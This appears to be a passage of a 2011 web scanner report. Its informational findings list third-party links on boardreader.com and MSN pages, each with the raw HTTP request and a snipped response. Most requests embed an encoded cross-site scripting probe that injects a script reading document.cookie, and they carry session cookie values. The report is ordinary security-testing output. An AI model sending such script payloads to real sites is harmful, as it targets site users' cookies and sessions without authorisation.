The page was loaded from a URL containing a query string:

http://boardreader.com/domain/myegy.com?ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&from_site_id=7486781

The response contains the following links to other domains:

http://clickaider.com/
http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://hit.clickaider.com/clickaider.js
http://hit.clickaider.com/i/button-30.gif
http://hit.clickaider.com/pv?c=9f671068-5&ctype=noscript
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /domain/myegy.com?ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&from_site_id=7486781 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:57:38 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:57:40 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</h2>

           <OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="600" HEIGHT="300" id="searcherGraph">
           <PARAM NAME=movie VALUE="/Charts/MSCombiDY2D.swf">
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</a> | 
<a class="footer_m" target="_blank" href="http://clickaider.com/" title="Tracked by ClickAider"><img src="http://hit.clickaider.com/i/button-30.gif" border="0"/></a>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>

<noscript>
<img src="http://hit.clickaider.com/pv?c=9f671068-5&ctype=noscript" alt="ClickAider" border="0" width="1" height="1" />
</noscript>
...[SNIP]...

17.61. http://boardreader.com/domain/ratedesi.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/ratedesi.com

Issue detail

The page was loaded from a URL containing a query string:

http://boardreader.com/domain/ratedesi.com?ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&from_site_id=13026

The response contains the following links to other domains:

http://clickaider.com/
http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://hit.clickaider.com/clickaider.js
http://hit.clickaider.com/i/button-30.gif
http://hit.clickaider.com/pv?c=9f671068-5&ctype=noscript
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /domain/ratedesi.com?ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&from_site_id=13026 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:03:06 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 13:03:11 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</h2>

           <OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="600" HEIGHT="300" id="searcherGraph">
           <PARAM NAME=movie VALUE="/Charts/MSCombiDY2D.swf">
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</a> | 
<a class="footer_m" target="_blank" href="http://clickaider.com/" title="Tracked by ClickAider"><img src="http://hit.clickaider.com/i/button-30.gif" border="0"/></a>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>

<noscript>
<img src="http://hit.clickaider.com/pv?c=9f671068-5&ctype=noscript" alt="ClickAider" border="0" width="1" height="1" />
</noscript>
...[SNIP]...

17.62. http://boardreader.com/domain/sherdog.net previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/sherdog.net

Issue detail

The page was loaded from a URL containing a query string:

http://boardreader.com/domain/sherdog.net?ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&from_site_id=14952

The response contains the following links to other domains:

http://clickaider.com/
http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://hit.clickaider.com/clickaider.js
http://hit.clickaider.com/i/button-30.gif
http://hit.clickaider.com/pv?c=9f671068-5&ctype=noscript
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /domain/sherdog.net?ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&from_site_id=14952 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:57:51 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:57:53 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</h2>

           <OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="600" HEIGHT="300" id="searcherGraph">
           <PARAM NAME=movie VALUE="/Charts/MSCombiDY2D.swf">
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</a> | 
<a class="footer_m" target="_blank" href="http://clickaider.com/" title="Tracked by ClickAider"><img src="http://hit.clickaider.com/i/button-30.gif" border="0"/></a>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>

<noscript>
<img src="http://hit.clickaider.com/pv?c=9f671068-5&ctype=noscript" alt="ClickAider" border="0" width="1" height="1" />
</noscript>
...[SNIP]...

17.63. http://boardreader.com/domain/ufc.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/ufc.com

Issue detail

The page was loaded from a URL containing a query string:

http://boardreader.com/domain/ufc.com?ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&from_site_id=9057873

The response contains the following links to other domains:

http://clickaider.com/
http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://hit.clickaider.com/clickaider.js
http://hit.clickaider.com/i/button-30.gif
http://hit.clickaider.com/pv?c=9f671068-5&ctype=noscript
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /domain/ufc.com?ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&from_site_id=9057873 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:03:02 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 13:03:05 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</h2>

           <OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="600" HEIGHT="300" id="searcherGraph">
           <PARAM NAME=movie VALUE="/Charts/MSCombiDY2D.swf">
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</a> | 
<a class="footer_m" target="_blank" href="http://clickaider.com/" title="Tracked by ClickAider"><img src="http://hit.clickaider.com/i/button-30.gif" border="0"/></a>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>

<noscript>
<img src="http://hit.clickaider.com/pv?c=9f671068-5&ctype=noscript" alt="ClickAider" border="0" width="1" height="1" />
</noscript>
...[SNIP]...

17.64. http://boardreader.com/domain/websitetoolbox.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/websitetoolbox.com

Issue detail

The page was loaded from a URL containing a query string:

http://boardreader.com/domain/websitetoolbox.com?ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&from_site_id=5898982

The response contains the following links to other domains:

http://clickaider.com/
http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://hit.clickaider.com/clickaider.js
http://hit.clickaider.com/i/button-30.gif
http://hit.clickaider.com/pv?c=9f671068-5&ctype=noscript
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /domain/websitetoolbox.com?ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&from_site_id=5898982 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:57:40 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:57:42 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</h2>

           <OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="600" HEIGHT="300" id="searcherGraph">
           <PARAM NAME=movie VALUE="/Charts/MSCombiDY2D.swf">
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</a> | 
<a class="footer_m" target="_blank" href="http://clickaider.com/" title="Tracked by ClickAider"><img src="http://hit.clickaider.com/i/button-30.gif" border="0"/></a>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>

<noscript>
<img src="http://hit.clickaider.com/pv?c=9f671068-5&ctype=noscript" alt="ClickAider" border="0" width="1" height="1" />
</noscript>
...[SNIP]...

17.65. http://boardreader.com/domain/worldmastiffforum.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/worldmastiffforum.com

Issue detail

The page was loaded from a URL containing a query string:

http://boardreader.com/domain/worldmastiffforum.com?ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&from_site_id=6024491

The response contains the following links to other domains:

http://clickaider.com/
http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://hit.clickaider.com/clickaider.js
http://hit.clickaider.com/i/button-30.gif
http://hit.clickaider.com/pv?c=9f671068-5&ctype=noscript
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /domain/worldmastiffforum.com?ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&from_site_id=6024491 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:57:49 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:57:51 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</h2>

           <OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="600" HEIGHT="300" id="searcherGraph">
           <PARAM NAME=movie VALUE="/Charts/MSCombiDY2D.swf">
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</a> | 
<a class="footer_m" target="_blank" href="http://clickaider.com/" title="Tracked by ClickAider"><img src="http://hit.clickaider.com/i/button-30.gif" border="0"/></a>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>

<noscript>
<img src="http://hit.clickaider.com/pv?c=9f671068-5&ctype=noscript" alt="ClickAider" border="0" width="1" height="1" />
</noscript>
...[SNIP]...

17.66. http://boardreader.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/index.php

Issue detail

The page was loaded from a URL containing a query string:

http://boardreader.com/index.php?a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1&ltype=ext

The response contains the following links to other domains:

http://clickaider.com/
http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://hit.clickaider.com/clickaider.js
http://hit.clickaider.com/i/button-30.gif
http://hit.clickaider.com/pv?c=9f671068-5&ctype=noscript
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s0.2mdn.net/viewad/817-grey.gif
http://www.google-analytics.com/urchin.js

Request

GET /index.php?a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1&ltype=ext HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:15:11 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

           <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <title>s0.2md
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="KonaBody">DA drops former Duke lacrosse accuser's arson case <a class="dashed_link" href="http://s0.2mdn.net/viewad/817-grey.gif" target=_blank><b>
...[SNIP]...
<div class="KonaBody">HERE IS ONE THEY MISSED ? Fayetteville man accused of stabbing puppy <a class="dashed_link" href="http://s0.2mdn.net/viewad/817-grey.gif" target=_blank><b>
...[SNIP]...
s="KonaBody">sharply curtailing the use of GlaxoSmithKline's (NYSE: GSK ) diabetes drug Avandia in September after it was linked to increased risks of heart attacks. Best of Benzinga: Best of Benzinga <a class="dashed_link" href="http://s0.2mdn.net/viewad/817-grey.gif" target=_blank><b>
...[SNIP]...
<div class="KonaBody">dette snur nok velgerflukten fra AP, og sammen med lehmo11 s gn..l om Eiendomskatt vil nok dette berge kommunevalget for AP neste ..r ? herregud som jeg gleder meg j.peiper <a class="dashed_link" href="http://s0.2mdn.net/viewad/817-grey.gif" target=_blank><b>
...[SNIP]...
</a> con los servicios de Cercan..as, lo que, seg..n Fomento, limita la posibilidad de establecer m..s servicios. <a class="dashed_link" href="http://s0.2mdn.net/viewad/817-grey.gif" target=_blank><b>
...[SNIP]...
<div class="KonaBody"><a class="dashed_link" href="http://s0.2mdn.net/viewad/817-grey.gif" target=_blank><b>
...[SNIP]...
<div class="KonaBody"><a class="dashed_link" href="http://s0.2mdn.net/viewad/817-grey.gif" target=_blank><b>
...[SNIP]...
</h2>
   <OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="270" HEIGHT="170" id="searcherGraph">
   <PARAM NAME=movie VALUE="/Charts/Line.swf">
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</a> | 
<a class="footer_m" target="_blank" href="http://clickaider.com/" title="Tracked by ClickAider"><img src="http://hit.clickaider.com/i/button-30.gif" border="0"/></a>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>

<noscript>
<img src="http://hit.clickaider.com/pv?c=9f671068-5&ctype=noscript" alt="ClickAider" border="0" width="1" height="1" />
</noscript>
...[SNIP]...

17.67. http://businessonmain.msn.com/browseresources/articles/firststeps.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://businessonmain.msn.com
Path:	/browseresources/articles/firststeps.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://businessonmain.msn.com/browseresources/articles/firststeps.aspx?cp-documentid=26675647&source=msneditorial&gt1=25049

The response contains the following links to other domains:

http://businessonmain.liveworld.com/
http://businessonmain.liveworld.com/BoM-contacts.jspa
http://businessonmain.liveworld.com/BoM-messages.jspa
http://businessonmain.liveworld.com/BoM-profile.jspa
http://businessonmain.liveworld.com/BoM-usersettings.jspa
http://businessonmain.liveworld.com/businessdirectory.jspa
http://businessonmain.liveworld.com/groups/Groups/800000000
http://businessonmain.liveworld.com/topic/Inspired-Entrepreneurs/Discussion-Topics/Did-Aha-Moment/800003844
http://download.live.com/?sku=messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/help.aspx?project=tou&mkt=en-us
http://insidemsn.wordpress.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://twitter.com/businessonmain
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=BEETSBS&mkt=en-us
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.facebook.com/pages/Business-on-Main/162288430462194
http://www.facebook.com/plugins/like.php?href=http://businessonmain.msn.com/browseresources/articles/firststeps.aspx?cp-documentid=26675647&layout=standard&show_faces=false&width=300&action=like&colorscheme=light&height=80
http://www.growbizmedia.com/
http://www.microsoft.com/library/toolbar/3.0/trademarks/en-us.mspx
http://www.smallbizdaily.com/
http://www.sprint.com/business
http://youtube.com/businessonmain
https://amch.questionmarket.com/adsc/d746470/2/746472/randm.js
https://amch.questionmarket.com/adsc/d746470/3/746471/randm.js
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296574239&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fbusinessonmain.msn.com%2Fbrowseresources%2Farticles%2Ffirststeps.aspx%3Fcp-documentid%3D26675647%26source%3Dmsneditorial%26gt1%3D25049&lc=1033&id=264792
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /browseresources/articles/firststeps.aspx?cp-documentid=26675647&source=msneditorial&gt1=25049 HTTP/1.1
Host: businessonmain.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:30:39 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA50
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=26e5c12a2c3b4163996ff0aaea2f6dc1; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=05620750052C494B8EED817C9396FC9E; domain=.msn.com; expires=Sat, 20-Aug-2011 15:30:39 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 53777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><noscript><m
...[SNIP]...
<body class=""><script type="text/javascript" src="https://amch.questionmarket.com/adsc/d746470/2/746472/randm.js"></script>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=BEETSBS&mkt=en-us">Bing</a>
...[SNIP]...
<li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296574239&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fbusinessonmain.msn.com%2Fbrowseresources%2Farticles%2Ffirststeps.aspx%3Fcp-documentid%3D26675647%26source%3Dmsneditorial%26gt1%3D25049&lc=1033&id=264792" class="dMSNME_1">Sign In</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Web</a>
...[SNIP]...
<li class="last"><a href="http://www.sprint.com/business" title="Brought to You By Sprint" onclick="return Msn.Navigation.OpenNew(event, this)"><img src="http://blstb.msn.com/i/C2/F78B5FD8886A5028961034FD49E2.png" width="234" height="44" alt="Brought to You By Sprint" />
...[SNIP]...
